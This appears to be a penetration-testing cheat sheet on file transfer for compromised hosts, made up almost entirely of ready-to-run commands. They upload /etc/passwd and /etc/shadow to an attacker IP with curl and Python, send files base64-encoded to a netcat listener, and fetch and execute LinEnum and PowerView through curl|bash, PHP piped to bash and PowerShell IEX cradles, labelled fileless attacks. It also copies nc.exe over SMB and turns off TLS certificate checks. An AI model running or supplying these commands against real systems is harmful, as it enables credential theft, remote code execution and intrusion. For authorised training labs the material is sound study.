File Transfers

Uploading

Python3

Starting the Python uploadserver Module

python3 -m uploadserver

Uploading a File Using a Python One-liner

python3 -c 'import requests;requests.post("http://192.168.49.128:8000/upload",files={"files":open("/etc/passwd","rb")})'

HTTPS

sudo python3 -m pip install --user uploadserver

Pwnbox - Create a Self-Signed Certificate

openssl req -x509 -out server.pem -keyout server.pem -newkey rsa:2048 -nodes -sha256 -subj '/CN=server'

Pwnbox - Start Web Server

mkdir https && cd https
sudo python3 -m uploadserver 443 --server-certificate ./server.pem

Linux - Upload Multiple Files

curl -X POST https://192.168.49.128/upload -F 'files=@/etc/passwd' -F 'files=@/etc/shadow' --insecure

Alternative Web File Transfer Method

Linux - Creating a Web Server with Python3

python3 -m http.server

Linux - Creating a Web Server with Python2.7

python2.7 -m SimpleHTTPServer

Linux - Creating a Web Server with PHP

php -S 0.0.0.0:8000

Linux - Creating a Web Server with Ruby

ruby -run -ehttpd . -p8000

Download the File from the Target Machine

wget 192.168.49.128:8000/filetotransfer.txt

`SMB`

Configuring WebDav Server

sudo pip install wsgidav cheroot
sudo wsgidav --host=0.0.0.0 --port=80 --root=/tmp --auth=anonymous

Connect from Windows

dir \\192.168.49.128\DavWWWRoot

Uploading Files using SMB

copy C:\Users\john\Desktop\SourceCode.zip \\192.168.49.129\DavWWWRoot

Impacket Server

impacket-smbserver [share name] [share path]
# ie: impacket-smbserver Folder ./data

Then from the Windows machine, mount the share:

net use s: \\[my ip]\[sharename]
copy [file] s:

`Powershell`

Installing a Configured WebServer with Upload

pip3 install uploadserver
python3 -m uploadserver

PowerShell Script to Upload a File to Python Upload Server

IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/juliourena/plaintext/master/Powershell/PSUpload.ps1')
Invoke-FileUpload -Uri http://192.168.49.128:8000/upload -File C:\Windows\System32\drivers\etc\hosts

PowerShell Base64 Web Upload

We can listen with netcat and then send a post request from our target to our machine with the file b64 encoded, then grab that post data from our server log

$b64 = [System.convert]::ToBase64String((Get-Content -Path 'C:\Windows\System32\drivers\etc\hosts' -Encoding Byte))
Invoke-WebRequest -Uri http://192.168.49.128:8000/ -Method POST -Body $b64

On our machine:

nc -lvnp 8000

Decode:

echo <base64> | base64 -d -w 0 > hosts

Downloading

Python

FTP

$ python3 -m pyftplib 21

Python 2 - Download

$ python2.7 -c 'import urllib;urllib.urlretrieve ("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh", "LinEnum.sh")'

Python 3 - Download

python3 -c 'import urllib.request;urllib.request.urlretrieve("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh", "LinEnum.sh")'

PHP

PHP Download with File_get_contents()

php -r '$file = file_get_contents("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh"); file_put_contents("LinEnum.sh",$file);'

PHP Download with Fopen()

php -r 'const BUFFER = 1024; $fremote = fopen("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh", "rb"); $flocal = fopen("LinEnum.sh", "wb"); while ($buffer = fread($fremote, BUFFER)) { fwrite($flocal, $buffer); } fclose($flocal); fclose($fremote);'

PHP Download a File and Pipe it to Bash

php -r '$lines = @file("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh"); foreach ($lines as $line_num => $line) { echo $line; }' | bash

Ruby

Ruby - Download a File

ruby -e 'require "net/http"; File.write("LinEnum.sh", Net::HTTP.get(URI.parse("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh")))'

Perl

Perl - Download a File

perl -e 'use LWP::Simple; getstore("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh", "LinEnum.sh");'

JavaScript

var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
WinHttpReq.Open("GET", WScript.Arguments(0), /*async=*/false);
WinHttpReq.Send();
BinStream = new ActiveXObject("ADODB.Stream");
BinStream.Type = 1;
BinStream.Open();
BinStream.Write(WinHttpReq.ResponseBody);
BinStream.SaveToFile(WScript.Arguments(1));

Download a File Using JavaScript and cscript.exe

cscript.exe /nologo wget.js https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1 PowerView.ps1

VBScript

dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
dim bStrm: Set bStrm = createobject("Adodb.Stream")
xHttp.Open "GET", WScript.Arguments.Item(0), False
xHttp.Send

with bStrm
    .type = 1
    .open
    .write xHttp.responseBody
    .savetofile WScript.Arguments.Item(1), 2
end with

Download a File Using VBScript and cscript.exe

cscript.exe /nologo wget.vbs https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1 PowerView2.ps1

Download a File Using wget

wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh -O /tmp/LinEnum.sh

Download a File Using cURL

curl -o /tmp/LinEnum.sh https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh

Fileless Attacks Using Linux

Fileless Download with cURL

curl https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh | bash

Fileless Download with wget

wget -qO- https://raw.githubusercontent.com/juliourena/plaintext/master/Scripts/helloworld.py | python3

SMB

Create SMB Server

sudo impacket-smbserver share -smb2support /tmp/smbshare

Copy file from server (cmd)

copy \\192.168.220.133\share\nc.exe

Newer versions of windows block unauthenticated SMB shares, we can create one with user and pass:

sudo impacket-smbserver share -smb2support /tmp/smbshare -user test -password test

net use n: \\192.168.220.133\share /user:test test

Powershell

PowerShell DownloadFile Method

(New-Object Net.WebClient).DownloadFile('<Target File URL>','<Output File Name>')

(New-Object Net.WebClient).DownloadFileAsync('<Target File URL>','<Output File Name>')

PowerShell DownloadString - Fileless Method

runs from memory

IEX (New-Object Net.WebClient).DownloadString('<Target File URL>')

PowerShell Invoke-WebRequest

Invoke-WebRequest <Target File URL> -OutFile <Output File Name>

Powershell download cradles

Occasionally IE first-launch has not run (IE engine not available), bypass with -UseBasicParsing

Invoke-WebRequest https://[ip]/PowerView.ps1 -UseBasicParsing | IEX

TLS Error

[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}

PreviousWindows NextExtracting Passwords

Last updated 12 hours ago

Uploading

Python3

Starting the Python uploadserver Module

Uploading a File Using a Python One-liner

HTTPS

Pwnbox - Create a Self-Signed Certificate

Pwnbox - Start Web Server

Linux - Upload Multiple Files

Alternative Web File Transfer Method

Linux - Creating a Web Server with Python3

Linux - Creating a Web Server with Python2.7

Linux - Creating a Web Server with PHP

Linux - Creating a Web Server with Ruby

Download the File from the Target Machine

SMB

Configuring WebDav Server

Connect from Windows

Uploading Files using SMB

Impacket Server

Powershell

Installing a Configured WebServer with Upload

PowerShell Script to Upload a File to Python Upload Server

PowerShell Base64 Web Upload

Downloading

Python

FTP

Python 2 - Download

Python 3 - Download

PHP

PHP Download with File_get_contents()

PHP Download with Fopen()

PHP Download a File and Pipe it to Bash

Ruby

Ruby - Download a File

Perl

Perl - Download a File

JavaScript

Download a File Using JavaScript and cscript.exe

VBScript

Download a File Using VBScript and cscript.exe

Download a File Using wget

Download a File Using cURL

Fileless Attacks Using Linux

Fileless Download with cURL

Fileless Download with wget

SMB

Create SMB Server

Copy file from server (cmd)

Mount SMB share with u/p

Powershell

PowerShell DownloadFile Method

PowerShell DownloadString - Fileless Method

PowerShell Invoke-WebRequest

`SMB`

`Powershell`